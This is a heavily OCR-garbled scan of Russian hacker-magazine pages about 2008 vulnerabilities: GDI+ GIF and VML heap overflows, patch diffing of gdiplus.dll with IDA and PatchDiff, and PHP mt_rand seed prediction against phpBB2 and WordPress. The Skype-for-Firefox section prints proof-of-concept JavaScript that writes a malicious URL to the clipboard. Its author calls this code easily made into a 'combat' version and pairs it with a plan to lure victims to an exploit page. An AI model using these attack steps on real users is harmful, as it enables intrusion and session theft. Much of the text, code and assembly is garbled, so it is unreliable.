ТАМ... ІВТОМ ЧИСЛЕ, И НЕИСПРАВЛЕННЫХ!). ПО СЛОЖИВШЕЙСЯ ТРАДИЦИИ, ЗАТЫКАЯ СТАРЫЕ 
ДЫРЫ, М5 УСПЕШНО ПРОБИВАЕТ НОВЫЕ. 



М56ЦІ+ 

I I УДАЛЕННОЕ 
V I ВЫПОЛНЕНИЕ 
КОДА В 6ІР-ПАРСЕРЕ 



>> ВгіеГ 



Графическая подсистема 
ѴѴІ п сі оѵѵз , реализованная в 
библиотеке 001 . ОЬЬ (позже 
она перелопачена в ООІ32 . 
БЫ,], создавалась опытными 
людьми, которые привыкли 
сначала думать, а потом кодить. 
Неудивительно, что ошибки в 
001 начали обнаруживаться 
только после того, как МісговоІН 
перенесла львиную часть гра- 
фического кода с прикладного 
уровня в ядро (поступившись 
безопасностью в угоду быст- 
родействию]. Уровень квали- 



фикации сотрудников ктому 
времени уже упал, а вместе с 
ним упало и качество кода. К 
власти рвались карьеристы, к 
клавиатурам тянулись индусы и 
воинствующие пионеры, стре- 
мясь разломать старый код и 
переписать его с нуля. Попытка 
создания улучшенной реализа- 
ции графической подсистемы 
(известной под именем 601+] 
не увенчалась успехом — новые 
возможности оказались поп- 
росту невостребованными, а вот 
ошибки полезли, как грибы пос- 
ле дождя. Значительная часть 
ошибок была ликвидирована 
в первыеже годы существова- 
ния (3 □ I + (смотри, например, 
«МісговоИ Зесигііу Виііеііп 
М504-028 Ви^ег Оѵеггип 
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ВЗЛОМ 




Официальный сайт группы Еѵіі Ріпдегз 



іп ОРЕО Ргосеззіпд (ООІ+) 

СоиШ АІІоѵѵ Сосіе Ехесиііоп» 

по адресу — тісговоН.сот/ 
ІесЬпеі/весипІѵ/ЬиІІеІіп/МВОД- 

8.тврх ). Однако дефекты 
проектирования продолжают 
обнаруживаться и сегодня. 
Девятого октября два ха- 
кера Реіег ѴѴІпІег-ЗтіІб 
[ЫВЗЗоЛѵѵаге) и Іѵап Ргаігіс 
(Еего Оау I п ібіабіѵе] независи- 
мо друг от друга обнаружили 
ошибку в парсере 61 Р-файлов, 
приводящую к переполнению 
буфера с возможностью удален- 
ного захвата управления. На 
самом деле, ошибок там намного 
больше (включая неинициали- 
зированные поля, используемые 
для вычисления размеров выде- 
ляемых блоков памяти, и косяки 



целочисленного переполнения! 
— такое впечатление, что пар- 
сер программировали даже не 
индусы, а чукчи. Исследование 
дизассемблера ых листингов 
реально вызывает шевеление 
волос на голове. У меня до сих 
пор шерсть дыбом стоит. Но об 
этом мы поговорим чуть позже, а 
сейчас вернемся к двум обозна- 
ченным хакерам, обнаружившим 
ошибку переполнения в СОШР 
Вігеат, длину которого, естест- 
венно, никто не проверяет. 



>>ТагдеІ5| 



I Е 6.0/5Р1 , ОДІсе ХР, ОЯІсе 2007/ 
5Р1/5Р2/5РЗ, ѴѴогсІ 2003/5РЗ, 
РоѵѵегРоіпі Ѵіе\л/ег 2007/5Р1 , 
Ехсеі Ѵіеѵѵег 2003/5РЗ, Ехсеі 
Ѵіеѵѵег 2007/5РЗ. 



>> Ехріоід 



_ІоЬп бтііб (Вася Пупкин) из 
хакерской группировки Еѵіі 

Ріпдегв [ \л/ѵѵ\л/. еѵі Ібі пае га . со ■ п ) . 

членом которой, кстати говоря, 
являюсь и я, выпустил ехріоіі, 
написанный на Перле. Можно 
скачать как с официального 
сайта группы — еѵіШпдегз. 
сот/раІсЬТие5СІаѵ/М508 052 
6РІ+ ѴиІпегаЬІІІІѵ ѵег2.1хІ . 
так и с независимых сайтов 
— весигііѵіосив.сот/сіаіа/ 
ѵиІпегаЫІИІев/ехрІоіІв/ЗІ 020.рІ . 



>> Боіиііоп 



Самое радикальное и самое 
надежное решение — найти и 
удалить библиотеку ОРІрІиз . 
Й11, поскольку все равно ее ник- 
то реально не использует. Ну... 
практически никто. Некоторые 
приложения могут перестать 
работать, вынуждая нас уста- 
навливать очередной комплект 
заплаток, скачать которые можно 
с зесигіМосив.сот/ЬісІ/ЗІ 020/ 
зоіиііоп . 

М5 6ЭІ+ 
ПЕРЕПОЛ- 
НЕНИЕКУЧИ 
ВѴЕСТОВ 
МАРКІІР ИАЫ6УА6Е 



>> Вгіе* 



МісговоО: вновь оказалась на 
высоте реализации своихже 
собственных стандартов. А ведь 
какхорошо все начиналось! В 



памятном 1998 году, пока рос- 
сияне пребывали в кризисном 
состоянии, МісговоД совместно с 
Масгогпеб іа усиленно продвигали 
на рынокязыквекторной размет- 
ки (Ѵесіог Магкир бапдиаде или, 
сокращенно, ѴМЦ, Внедрялся он 
непосредственно внутрь НТМб- 
кода и претендовал на стандарт, 
представленный на рассмотрение 
организации ѴѴЗС. Впрочем, боль- 
шого распространения ѴМбтак и 
не получил и в настоящий момент 
(опционально) его поддерживает 
только Ѳоодіе Марз. 

В частности, следующий 
код выводит на экран за- 
крашенный эллипс: «<ѵ: 
оѵаі збу1е= "розібіоп : 
аЬзоІибе; 1ебб:0; бор:0; 
ѵѵісИгіі: ЮОрх; ЬеідЬб : 50рх” 
Еі11со1ог= "Ыие " />». 
Девятого октября хакер бгед 
МасМапивизѴегіВідп отправил 
в Юеіепзе бабв сообщение об 
обнаруженной им уязвимости 
в ѴМб, конструктивно реализо- 
ванной в динамической библи- 
отеке ѲйіРІиз . (311 (ІОеІепве 
І_аЬв платит за информацию о 
дырах). Краткое техническое 
описание проблемы можно 
найти на ІаЬв.ісІе(еп5е.сот/ 
іпІеШаепсе/ѵиІпегаЫІІІІеа/ 

43 и в офици- 
альном бюллетене безопас- 
ности М508-052: ао.тісгозоН. 
сот/1ѵѵІіпк/?ЕіпкІсі = 1 25468 . Не 
помешаеттакже сходить и на 
сайт Веси гііу Ро сив, где дыра 
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Бсаппіпд 1=ог ^ипсхіопг , 
рйгзіпд 5есопс( ісІЬ..* 
рйГ 5 і пд 14 Г5 X. і йЬ « ■ . 
сИ Т'ГІ пд. 

Хйеп^ісаі ічіпс^іопе; 6367 

магсііесі Гипссіопз: из 

ІІпта^сИесІ Типс^іопа 1; 150 

иіптассііед ічлісЫопе г: іге 



сЗоое 1 



г 



АК; ісііе 


Ооюп 


ОІ5І 


4БОМ6 





Резулыатсравнения непатченной и исправленной версий библиотеки С □ I ріиз.сііі утилитой РаІсЬОІЛ 



проходит под номером #31020: ѵѵѵѵѵѵ.весигИѵІосиа.сот/Ьіб/ЗІ 020 . 

Однако ни один из этих ресурсов не дает ответа на вопрос: в чем, 
собственно, состоит суть программы и каким образом осуществить 
переполнения. Зарывшись в дебри д изассембл ер ных листингов, 
я быстро выяснил, что система позволяет создавать эллипсы с 
отрицательным фокусом, но не умеет рассчитывать объем дина- 
мической памяти, требующийся для их размещения (тривиальное 
целочисленное переполнение в процессе умножения]. В результате 
происходит классическое переполнение кучи, приводящее к воз- 
можности удаленного захвата управления со всеми вытекающими 
отсюда последствиями. 



>> Тагдеіз 



ІЕ 5. 5/6. 0, СЖІсе ХР, ОГІІсе 2007/ВР1/ВР2/ВРЗ, ѴѴогсІ 2003/ВРЗ, РоѵгегРоіпі 
Ѵіеѵѵег 2007/ВР1 , Ехсеі Ѵіеѵѵег 2003/ВРЗ, ЕхсеІѴІеѵгег2007/5РЗ. 



>> ЕхрІоіі| 



_Іобп5ті1:ЫВася Пупкин] из хакерской группировки Еѵіі Ріпдегв 
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[ ѵѵ'л/ѵѵ.еѵііііпаегз.сот ). выпустил ргооі-оі-сопсері ехріоіі, который 
можно скачать как с официального сайта группы — бЛр:// 
еѵіЩпдег5.сот/оа1сЫие5СІаѵ/М508 052 6РІ+ ѴиІпегаЬНІІѵ.М . та к и 
с независимых сайтов: сіоѵѵпІоасІз.БесигИѵІосиБ.сот/ѵиІпегаЬЦИІеБ/ 
ехрІоіІз/ЗІ 01 8.ЫтІ.М . 



>> Боіиііоп 



Самое радикальное и самое надежное решение (какуже отмечалось 
выше] — найти и удалить библиотеку ОБІрІиз . сЗ.1 X , поскольку все 
равно ее никто реально не использует. 

РАСШИРЕНИЕ «5КѴРЕ» ДЛЯ 
РІКЕРОХ 

ДОСТУП К БУФФ ОБМЕНА — 



>> Вгіе* 



Какое отношение имеет Вкуре к ѲОІ+? Как можно эксплуатировать 
уязвимость в ІЕ через Горящего Лиса? Оказывается — можно! Со- 
циальная инженерии в совокупности с систематическим подходом 
делают свое дело! 

Седьмого октября 2008 на тіЬл/Огт'е появился ехрІоН, написанный 
польским хакером с труднопроизносимым ником Ігк4з. Он демонст- 
рирует направленную атаку на буфер обмена через Вкуре-расшире- 
ниедля ГорящегоЛиса [ бирзѴ/беѵеІорег.зкѵре.сот/ВкѵреТооІЬагв І. 
пользующееся большой популярностью и предустановленное на 
множестве компьютеров и ноутбуков. 

Подробности — в блоге первооткрывателя дыры [ ігкДг.щогсІргевв. 
сот ], кстати, до сих пор еще не засветившейся на Весите РосиБ’е. 
Наверное, это потому, что хакер изъясняется исключительно на поль- 






Скайповое расширение к ГорящемуЛису 
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взлом 





ском языке. Мой перевод предлагается ниже: «Я нашел ошибку в 
Скайповом расширении для Горящего Лиса, позволяющую модифи- 
цировать системный буфер обмена по своемуусмотрению. Забавно, 
что данное расширение автоматически устанавливается инсталля- 
тором Зкуре, так что количество уязвимых машин должно быть очень 
велико. Описанная дыра похожа на недавно обнаруженную уязви- 
мость, открывающую доступ к буферу обмена посредством АбоЬе 
Ріазб и АсііопЗспрІ, что позволяет эта кующему манипулировать его 
содержимым». А где же здесь ІЕ? А вот где! Скидываем жертве ссыл- 
ку на сайт, сообщая, что его нужно смотреть только через ІЕ. 

Пусть это будет какой-нибудь приличный сайттипа 'л/ѵѵѵѵ.агсте.сот . 
амытемвременем незаметно подменяем адрес в буфере обмена 
и когда жертва вставит его в ІЕ, она неожиданно окажется на ѵѵѵѵѵѵ. 
^гее-5Ыиѵ-Ьо5бпо.сот/-Ііа[ѵаѵа/еѵі[.Ніт[ . где ее поимеет злобный 
НТМБ-код, эксплуатирующий одну из вышеописанных дыр в ІЕ. 



>> Тагде1з| 



Уязвимость подтверждена в Зкуре ехіепзіоп іог Рі геГох ВЕТА 2.2.0.95. 
Про другие версии ничего не известно. 



>> ЕхрІоіі| 



Демонстрационный ехріоіі можно скачать с тіІѵѵОгт.сот/ехрІоіІ. 
р М р ?і сі =6690 или воспользоваться исходным кодом, приведенным 
ниже (чтобы превратить его в боевую модель, достаточно убрать 
комментарии, заботливо вставленные автором): 

ДЕМОНСТРАЦИОННЫЙ ЕХРІ_ОІТ, 

ЛЕГКО ПРЕВРАЩАЕМЫЙ В БОЕВОЙ 

<а1ігеі:="#" опс1іск= " сЬеск_іЪ ( ) ; " >кезк іС!</а> 
<зсгірк Суре= " СехС / ] аѵазсгірС " > 

бипсСіоп сору_Со_с1ірЪоагс1 ( СехС ) { 
іб ( зкуре_Соо1 ) { 

ѵаг сору_іС = СехС + ' \0+' ; //изе пиіі ЬуСе Со сору 
ѵаіие, Ьесаизе ' + ' сЬаг шизС Ье іп зСгіпд 
зкуре_Соо1 . сору_пиш ( сору_іС ); 

} 

} 

бипсСіоп сЬеск_іС ( ) { 

//сору_Со_с1ірЬоагсі ( 'шаіісіоиз СехС ! !!!!!!!!! ! \п\ 




Графическая репрезентация результатов сравнения непатченной и 
исправленной версии библиотеки ЭОІрІиз.сШ 



сот/ 1 ) ; 

сору_Ьо_с1ірЪоагс1 ( ' кССр : / /шаіісіоиз . Ііпк . Со .Ъасі . 
раде/ ' ) ; 

аІегС ( 1 Бопе I СЬеск уоиг сІірЬоагсП ' ) ; 

} 

</зсгірС> 



>> БоІиНоп 



Внимательно следить за буфером обмена. Это единственное «ле- 
карство», существующее на сегодняшний день. 

ВБІ+ ІЫТЕКЫАІ.5 

Несмотря на то, что библиотека ОВІрІив.йІІ используется только 
Офисом и ІЕ, она стоиттого, чтобы в ней поковыряться ломом на пред- 
мет поиска свежих багов... МісгозоГі, как водится, затыкает намного 
больше ошибок, чем описывает в бюллетенях безопасности. Да и те 
затыкает впопыхах, и только со второй третей попытки ей удается ра- 
зогнать бардак, вернее, перегнать баги из одного места в другое. Как 
показываетхакерский опыт, совокупное количество ошибок представ- 
ляет собой константу, осциллирующую вокруг некоторого значения. 
Библиотека ЭОІрІиБ.сШ. интересна еще и тем, что позволяет проде- 
монстрировать широкий арсенал хакерскихтехник, использующихся 
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Наша подопытная находится на 44-м месте в списке таісітесі-функций 



для анализа патчей. Сравнивая оригинальную и пропаченную вер- 
сию, мы найдем, что именно исправила МісговоН и локализуем дыру 
вместе с обстоятельствами ее проявления. Сравнивать, естественно, 
будем утилитой РаісЬСШ — бесплатным аналогом коммерческого 
плагина к ЮА Рго, скрывающимся за невразумительным названием 
ВМИГ. 

Однако РаІсІЮІІТ обнаруживает слишком много различий, большая 
часть из которых нам неинтересна и совершенно непригодна ни для 
локальных, ни, тем более, для удаленных атак. РаІсГЮІН, конечно, 
мощное оружие, но хакерствовать все-таки приходится головой. 
Дедуктивный метод (активно использовавшийся Шерлоком Холм- 
сом) позволяет отсеять огромное количество «холостых» функций на 
ранних стадиях анализа. Пару выпусков назад мы бегло описывали 
возможности Ра(сЬ0і(Га. Теперь, когда ты уже немного освоился с 
ним, пришла пора переходить от пассивного созерцания к активному 
вторжению в машинный код. 

Нам потребуется ЮА Рго 5.2 или выше (ЮА Рго 5.3 в действительнос- 
ти представляет собой большой Ьид-біх) . Бесплатная версия не под- 
держивает плагинов, но эту проблемулегко решить, найдя в Сети или 
Осле статьи на тему «ЮА Рго для бедных». РаШНйіН денег не просит 
и потому общедоступен — саіТепаЫевесипІѵ.сотЛепаЫе/раІсМІЮ 
рЬр.Авот поиск графической библиотеки ѲОІрІив.сІЦ намного более 
проблематичен, чем это кажется на первый взгляд — слишком много 
версий и все такие разные. Я решил выложить анализируемые биб- 
лиотеки на свой сервер, благо они ге-сПвІгіЬиіаЫе. Качай — пегиті. 
ога.ги/воигіт/ОРІоІив.гаг . 

Открываем пропатченную версию в ЮА Рго, дожидаемся окончания 
процесса дизассемблирования и выходим из ИДЫ, выгружая базу 
в і б Ь -файл. Открываем оригинальную версию, дизассемблируем. 
Затем лезем в меню «Ебіі Ріидіпв» и зовем «РаІсЬШІ» или просто 
нажимаем <СТПІ_-8>, открывая ранее сохраненную базу пропатчен- 
ной версии библиотеки. Даем РаІс1ЮІ(Ту поработать минут с полчаса 
(на Ре піі и по - 1 1 1 Соррегтіпе) и втыкаем в результат. 

А он таков: 1 19 таісбеб- функций (парных функций, в которых 
найдены различия — основных кандидатов на пост президента, 
тьфу, в хранители багов); 276 иптаісИеб-функций (тех, которые 
отличаются настолько сильно, что РаІсЬБІД'у не удалось сопос- 
тавить их друг с другом ; баги здесь также вполне вероятны, но 
искать их — тухлое дело, требующее много ручной работы); 6367 
идентичных функций (полностью совпадающих друг с другом; 
баги здесь, если и есть, то кочующие от одной версии к другой, то 
есть неисправленные). 

В от та кая, значит, ситуация. С учетом размера библиотеки (1 ,7 Мб) 
количество тэісЬесІ -функций не та к уж и велико, однако, в пересчете 
на естественные единицы (пиво, сигареты) положение практически 
безнадежно. Даже если на анализ каждой функции тратить поряд- 
ка 1 0 минут, то процесс завершится через 119 10/60 = 1 .190/60 = 20 
часов. С учетом реальной производительности труда нам потребу- 
ется по меньшей мере пара дней напряженной работы, причем безо 
всяких гарантий на успех, поскольку искомый код может скрываться 
виптаісбеб- функциях. На иханализ уйдет больше недели! Да за 
это время все мозги скурить можно, а из пивных бутылок построить 
скульптуры в стиле «Москва наноситудар по Церетели». 

А что если у настолько одна банка пива и меньше пачки сигарет? Ус- 
пеемлимы завершить анализ? Успеем! Главное — выработать план 
и четко ему следовать. Тупое попарное сравнение функций как-то не 
возбуждает. 
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РабсИОІГГ — мощная утилита для сравнения патчей, распространяемая 
на бесплатной основе 



В самом деле, повадки противника хорошо известны. Почему бы не 
нанести удар в наиболее вероятные места локации? Может, кто пом- 
нит детские игрушки середины 80х? Всякие лабиринты, по которым 
катается шарик? Я (да и не я один) уже тогда выяснил, что проходить 
лабиринт лучше не с начала, а с конца (вообще-то, правильно сконс- 
труированный лабиринт должен быть к этому параллелен, вот только 
правильных лабиринтов вокруг нас упорно не наблюдается и чаще 
попадаются бракованные). 

Также и здесь. Переполнение кучи (если таковое есть) завязано на 
функциях из серии НеарАІІос, вызываемых напрямую или же через 
обертки типа таііос или пей. Целочисленное переполнение часто 
(хотя и не всегда) связано с машинной командой ІМШЗ. Вот их-то мы 
и будем искать в дизассемблерном тексте, а точнее в таісбеб-функ- 
циях. Быстро, дешево и сердито. Результат, конечно, не гарантиро- 
ван, но нам везет, и дырявая функция обнаруживается буквально 
через несколько минут стучания по клавиатуре. 

Вотона— іпр збсісаіі зиЬ_4ЕО096ЕБ (НІССЩ Мсоп, іпр). 

Тутсразу и ІШЬ, и вызов НеарАІІос, причем умница ЮА Рго 
распознала НеарАІІос даже во вложенной функции, правильно 
определив назначение передаваемого ей параметра как ФиВуРез. 
Возьмем этоттрюк на заметку! 



ФУНКЦИЯ БИБЛИОТЕКИ С0ІРШ5.0БІ, НАЙДЕННАЯ 
ДЕДУКТИВНЫМ МЕТОДОМ (ПРИВЕДЕН ИСПРАВЛЕННЫЙ ВАРИАНТ) 

. Рехр : 4ЕВ09 6ЕВ 

; іпр зСйсаІІ 5иЪ_4ЕВ09 6ЕВ (НІСОЫ Ысоп, іпр) 

. СехС : 4ЕВ096ЕВ зиЪ_4ЕВ09бЕВ ргос пеаг 
; СОВЕ ХКЕЕ: зиЬ_4ЕВ09ВЕ2+32р 



Сехб : 4ЕБ097БЕ 




шоѵ еах. 


[ еЬр+ѵаг_42С . ЪтіНеасІег . ЬіНеідІіІ: ] 


бехб : 4ЕБ097Е4 




шоѵ есх. 


[еЬр+ѵаг_42С .ЪтіНеасІег .ЪіМіббЪ] 


бехб : 4ЕБ097ЕА 


ссід 


бехб : 4ЕБ097ЕВ 


хог еах, есіх 


бехб : 4ЕБ097ЕБ 


зиЬ еах, есіх 


бехб : 4ЕБ097ЕР 


пед еах 


Сехр : 4ЕБ097Е1 


ітиі есх, еах 


СехР : 4ЕБ097Е4 


пед есх 


бехб : 4ЕБ097Е6 


зЪІ есх, 2 


бехб : 4ЕБ097Е9 


ризЪ есх 


; сЫВубез 


// размер выделяемого блока 


бехб : 4ЕБ09830 


саіі зиЬ_4ЕС52209 



; / /внутри этой функции спрятан НеарАІІос 



. Рехр : 4ЕС522 09 

; іпр зЬйсаІІ зиЬ_4ЕС52209 (ВИОКВ йиВуРез ) 

. РехЬ : 4ЕС52209 зиЬ_4ЕС52209 ргос пеаг 
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СехС : 4ЕС522 09 


Ъехс : 4ЕС522 09 сІмВуЪез = дмогд 


1 рЬг 8 


СехС : 4ЕС522 09 


ЬехЬ : 4ЕС52209 


тоѵ 


есіі , есіі 


Ъехі: : 4ЕС522 0В 


ризЬ 


еЬр 


ЬехЬ : 4ЕС522 ОС 


тоѵ 


еЬр, езр 


Ьехі: : 4ЕС522 0Е 


ризЪ 


[еЬр+сЫВуЬез 


; йтоВуЪез 


ЕехС : 4ЕС52211 


ризЬ 


0 


; сЫРІадз 


СехС : 4ЕС52213 


ризіі 


ІіНеар 


; ІіНеар 


Ііехі: : 4ЕС52219 

; // вот он ! ! 


саіі 

і 


сіз : НеарАІІос 


Ъехі: : 4ЕС5221Р 


рор 


еЬр 


Ьехі: : 4ЕС5222 0 


геЬп 


4 


СехС : 4ЕС5222 0 зиЪ_ 


_4ЕС522 09 


епсір 



Кстати, наша подопытная располагается в списке таісбесі-функций 
на почетном 44-м месте. То есть, где-то примерно посередине, и 
потому искать ее тупым попарным перебором пришлось бы очень 
долго. Атак... мы потратили на это — считанные минуты. Конеч- 
но, без везения здесь необошлось.нос другой стороны, ведь и с 
ножом у горла никто не стоял! Задача хакерства — поразить цель с 
ультразвуковой скоростью, а целей для атаки намного больше, чем 
свободного времени. Если штурм крепости завершился провалом, 
мы просто переходим к следующей — вот и все! 

Кстати, забавная деталь — ошибка -то совсем не там, хотя и в функ- 
ции зиЪ_4ЕБ096ЕБ (НІСОЫ Мсоп, іпр ) ! Непатченная версия 
«забывала» инициализировать поле ЬтіНеайег .ЬіНеідЫ; и 
потому в пофиксенной библиотеке появилась команда «тоѵ еах, 
[еЬр+ѵаг_42С . ЪтіНеасІег . ЬіНеідЫ: ] », которую, собственно го- 
воря, и «запеленговал» РаісНОІОі Однако, ошибка никуда не исчезла, 
а как была, так и осталась. 

Команда ІШЬ (смотри строку« . Еехр : 4ЕВ097Е1 ітиі есх, 
еах») подвержена целочисленному переполнению, подробно опи- 
санному в блоге 5есигііѵ[аЬ5.уѵеЬзеп5е.сот/сопіеп1:/ВІоа5/31 78.азрх 

(уязвимость парсера КІ_Е-файлов в ВОІ+), где приводится бажная и 
исправленная версии библиотеки ѲБІрІиз . <311. 

При всей внешней схожести между этими примерами естьсущест- 
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После патча 



венное различие. В нашем случае ШШУ используется для детекции 
целочисленного переполнения (М5ѴС и некоторые другие компилято- 
ры автоматически вставляют код, препятствующий передаче функции 
НеарАІІос заведомо некорректных значений). А вот в примере, 
взятом из блога, инструкция ІШЬ задействована в вычислении тре- 
буемого размера блока выделяемой памяти. Совсем не одно и то же! 
Поэтому сам по себе ІМШУ — еще не свидетельство наличия дыры 
и прежде, чем выносить окончательное заключение, следует 
проанализировать примыкающий к ней код. Конечно, это требует 
времени, но код, вставляемый компилятором, весьма характе- 
рен и распознается с первого взгляда. А как именно он борется 
с переполнением, подробно рассказывается в блоге одного из 
сотрудников МісговоИ: Ыоав.тзсІп.сот/тісЬаеІ боѵѵагсІ/агсЫѵе/2 
005/1 2/06/500629.азрх .-з- 
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ВЗЛОМ ГЕНЕРАТОРА СЛУЧАЙНЫХ ЧИСЕЛ — ІЛ.ТІМАТЕ-БАГ ДВИЖКА РНР 



эксоксоксокс о 

Недавно обнаруженная известиьім_ІТ Зесигйу специалистом Стефаном а 



Эссером уязвимость в интерпретаторе РНР теоретически может затронуть 



миллионы веб-сайтов, на которых используется РНР<=5.2.5. Тебе интер 

ПТ >1- 2 - ж. ш ж ш ж « ■ - » к 

но, в чем суть уязвимости? В статье я разобрал ааѵізогу бага по полочкам. 1 



ес- 



а г затрагивает функции генерации псевдослучайных чисел 
гапй() и тр_гаш} (). Зачастую они используются для 
создания паролей, сессий, кукисов и других различных 
конфиденциальных данных пользователя. 

КапйО — это просто враппер для библиотеки ІіЬс гапй( ) ,а 
тр_гапсі( ) — враппер для генератора псевдослучайных чисел Мегвеппе 
Тѵѵізіег. Обе функции используюттак называемый веесі (семя), который 
можнозадаватьсоответственнофункциями вгапсЦ): и тр_згапй ( ) . 

По дефолту сид представляет собой 32-битный ШОКЛ (2 в 32 степени или 
4294967296 комбинаций). Обычнотакой длины достаточно, чтобы обес- 
печить криптографическую стойкость приложения. Ведь для брутфорса 
пароля, сгенерированного с помощью одной из этих функций, необходимо 
знать не только сид, но и сгенерированные на его основе числа. Впрочем, 
существует ряд ситуаций, в которых брутфорс вполне применим... 



Н ЗАТРАВКА 

ВРНР4иРНР5<=5.2.0 присутствует следующая недоработка: любой 
5ееб, вызываемый тр_вгапсі( ) , либо присваиваемый автоматически, 
имеет разрядность всего 31 бит, так как последний бит всегда устанав- 
ливается равным одному. Таким образом, для брутфорса семени нам 
нужно перебрать 2147483648 комбинаций. Уже лучше, но все-таки для 
эксплуатации такого бага времени потратить придется немало. 

В последующих версиях РНР эту недоработку залатали, но оставили 
другую. ВРНР4иРНР<=5.2.5всякийраз, когда 26 последних бит 
становятся равными нулю, веесі также принудительно становится 
равным нулю (либо 1 , в зависимости отустановки принудительных 
бит системой). Это правило действует для 32-битных систем. На 
64-битных системах ситуация чуть лучше — сид просто становится 
24-битным. 
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Блог Стефана Эссера 



а ПРИНУДИТЕЛЬНАЯ ГЕНЕРАЦИЯ 5ЕЕ0 

Выше я раскрыл одну сторону бага, а теперь — самое вкусное! Если ты 
любишь покопаться в сорцах бесплатных РНР-цмсок, то, наверняка, 
знаешь, что их кодеры очень любят инициализировать генераторы 
псевдослучайных чисел при помощи функций згапд() и тр_згапсі(): 

тС_згапсЗ (Ьіте О); 

т(:_згапсЗ ( (йоиЫе) тісгобітеО * 100000); 
тС_згапй ( (йоиЫе) тісгоЬішеО * 1000000); 
тб_згапй ( (йоиЫе) тісгобітеО * 10000000); 

Такая инициализация не криптоустойчива, потому что: 

1. функция бітеО не является случайной. Ее значение будетизвестно 
хакеру. Даже если админы намеренноустановятлокальное время сер- 
вера ошибочным, — его точное значение всегда будет возвращаться в 
НТТР-за головках; 

2-4. первое слагаемое (ОоиЫе) тісгобіте ( ) будет равно 0, либо 1 , а 
второе — соответственно, от 1 00000 до 1 0000000. В итоге, получаем для 
брутфорса все то же число: от 100000 до 1 0000000 значений. При 1000000 
значений процесс брутфорса сида займет всего несколько секунд! 

□ КЕЕР-АЫѴЕ СОЕДИНЕНИЯ 

Материал был бы бесполезным, если бы не тот факт, что Кеер-аііѵе 
НТТР-соединения всегда обслуживаются одним и тем же процес- 
сом на удаленном веб-сервере! Это означает, что зееб, сгенериро- 
ванный единожды на одном домене этого сервера, будет таким же и 
для другого домена на этом сервере! То есть, если какой-либо рбр- 
скрипт вы ведет сгенерированные случайные числа, мы сможем 
определить по ним сид, — и остальные случайные числа генерить 
на его основе! Правило, какты уже понял, относится нетолько к 
одному хосту, но и ко всем хостам на удаленном сервере. Нельзя не 
заметить, что это действует только для РНР, запущенного как мо- 
дуль Апача, а вот для сді генераторы псевдослучайных чисел всегда 
будут инициализироваться заново. Но сді, скорее, исключение из 
правил, так что не будем брать его в расчет. Кстати, Стефан Эссер 
подсказал здесь хи нт. Если ты хостишься на одном сервере с жертвой, 



то можешь принудительно запустить скрипт на своем хосте с згапй( 0) 
или тЕ_згапй( 0 ) . Сидужертвы будет, соответственно, 0 :). 

Ей ОТ ТЕОРИИ К ПРАКТИКЕ 

Настало время обобщить все сказанное. Итак, запусти следующий 
скрипт: 

<?рЬр 

тб_згапй(31337) ; 
ргіпЬ тС_гапй ( ) . " \п" ; 
ргіпЬ тС_гапй ( ) . " \п" ; 
ргіпЬ тб_гапй ( ) . " \п" ; 
ргіпС тр_гапй ( ) ; 

?> 

При каждом выводе тб_гапй ( ) тебе будут показаны одинаковые чис- 
ла, так как 5ееб везде один и тот же. Теперь за пусти другой скрипт: 

<?рЬр 

ргіпЬ гапй () . " \п" ; 
ргіпС гапй ( ) ; 

?> 

Допустим, ты получил числа 1 1834 и 2795. Снова запускай данный код, но 
теперь в качестве сида укажи первое получившееся число: 

<?рЪр 

згапй ( 11834 ) ; 
ргіпЬ гапй () . " \п" ; 
ргіпй гапй ( ) ; 

?> 

В итоге ты получишь числа 2795 и 28744. 

Обрати внимание на предыдущий результат :]. Эту особенность 
генератора обнаружил газОг (ссылки на его адвисори смотри во 
врезке). 
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И мускула асітіп и асІтіп[55 пробелов] равны 

Н СР055 АРРЫСАТІОЫ АТТАСК5 

Некоторые веб-приложения сами инициализируютзееб, а затем выводят 
полученные на его основе псевдослучайные числа конечному пользова- 
телю. Пример та кого приложения — рЬрВВ2. Вот код из зеагсЬ.рЬр: 

тб_згапй ( (йоиЫе) тісгобітеО * 1000000); 

$зеагсЪ_ій = тб_гапй ( ) ; 

Проблема в этом примере заключается в том, что количество комбинаций 
составляет всего 1000000, плюс в Ыті-исходнике страницы мы увидим 
выводзначения $зеагсЬ_ісІ. Кактыуже понял, зная сгенерированное 
случайное число, мы, фактически, знаем и веесПТем более, на сравнение 
1000000 результатов работы генератора с полученным $зеагсЬ_ій 
уйдет совсем немного времени. Простор для действий тут очень большой. 
Можно создать гаіпЬо\л/-таблицы со всего л ишь 1000000 значений. 
Ситуация верна для РНР 5 => 5.2.1 .А в случае сРНР4иРНР5<=5.2.0 
она становится еще лучше! Для них количество вариантов сокращается 
почти в два раза, то есть до 2 в 19 степени. Причинуя описал в первых 
абзацах. 

Ты спросишь, почему же в этом примереутечка сгенерированного числа 
является проблемой безопасности? Вот почему: 

1.3а пуск генератора случайных чисел влияет не только на представлен- 
ный в примере рЬрВВ2, но и на остальные веб-приложения.установлен- 
ные на этом сервере; 

2. Псевдослучайные числа, сгенерированные на основе предыдущего 
веесі, будутпредсказуемыми; 

3. Остальные приложения на этом же сервере могут создавать пароли, 
сессии ит.д. на основе полученного ранее веесі. 

Теперь рассмотрим ситуацию, когда рЬрВВ2 и любимый мной ѴѴогсІРгезз 
установлены на одном сервере. Отталкиваясь от полученной выше ин- 
формации, Стефан описываеттакой алгоритм атаки на веб-приложения 
[Сгозв Арріісаііоп Аііаскв): 

1. Запускаем кеер-а Ііѵе соединение к поиску рбрВВ2 и ищем любое 
часто встречающееся слово, вроде «а», «ІЬе» и т.д ; 



Ссылки по теме : 

• Ьир:/Аѵтѵ.5изрекбог8/2008/08/17/тІ: згаті-апсі-поі-зо- 
гапйот-питЬегз — оригинальное айѵізогу Стефана Эссера на тему 
ті_гапс10 

• Ьар:/Ауѵуѵѵ.5изрекбогг/2008/08/18/тѵ5д1-апс1-5д1-со1итп- 
ггипсагіоп-ѵиІпегаЬіІігіез — Му5<2Ь апсі 5(Д Соіитп Тгипсаііоп 
ѴиІпегаЬіІіІіез 

• Ьир : / /тіЬѵОгт.сот/ехрІоіІз /6421 — ѴѴогсІргезз 2.6.1 (5<2Ь 
Соіитп Тгипсаііоп) Асітіп Такеоѵег Ехріоіі 

• Ьар : / /гагОг.пате Аѵр-сопіепі/иріоасіз /2008 /08 Лѵрі .Ьіті 

— ѴѴогсІргезз 2.5 < = 2.6.1 1Ьгои§ЬрЬрВВ2 Кезеі Айтіп РаззѵѵопЗ 
Ехріоіі 

